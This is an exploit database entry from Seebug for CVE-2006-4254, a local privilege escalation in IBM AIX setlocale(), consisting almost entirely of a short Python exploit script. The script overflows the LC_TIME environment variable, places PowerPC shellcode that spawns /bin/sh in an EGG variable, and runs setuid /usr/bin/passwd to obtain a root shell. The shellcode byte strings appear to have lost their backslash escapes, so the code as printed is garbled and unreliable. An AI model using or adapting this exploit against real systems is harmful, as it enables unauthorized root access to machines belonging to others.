IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit

2007-11-08T00:00:00
ID SSV:7461
Type seebug
Reporter Root
Modified 2007-11-08T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #
#setlocale() exploit for aix 5.2 ( CVE-2006-4254  )
#thomas.pollet@gmail.com
#
from os import execve

bof="a"*580+"bbbbccccddddx2fxf2x28x2f"
egg="x60"*2350
shellcode=(            # by intropy <at> caughq.org
"x7cxa5x2ax79"     # xor.    r5,r5,r5
"x40x82xffxfd"     # bnel    <shellcode>
"x7fxe8x02xa6"     # mflr    r31
"x3bxffx01x20"     # cal     r31,0x120(r31)
"x38x7fxffx08"     # cal     r3,-248(r31)
"x38x9fxffx10"     # cal     r4,-240(r31)
"x90x7fxffx10"     # st      r3,-240(r31)
"x90xbfxffx14"     # st      r5,-236(r31)
"x88x5fxffx0f"     # lbz     r2,-241(r31)
"x98xbfxffx0f"     # stb     r5,-241(r31)
"x4cxc6x33x42"     # crorc   cr6,cr6,cr6
"x44xffxffx02"     # svca
"/bin/sh"
"x05")

execve("/usr/bin/passwd",[""],{"EGG":egg+shellcode,"LC_TIME":bof})

# sebug.net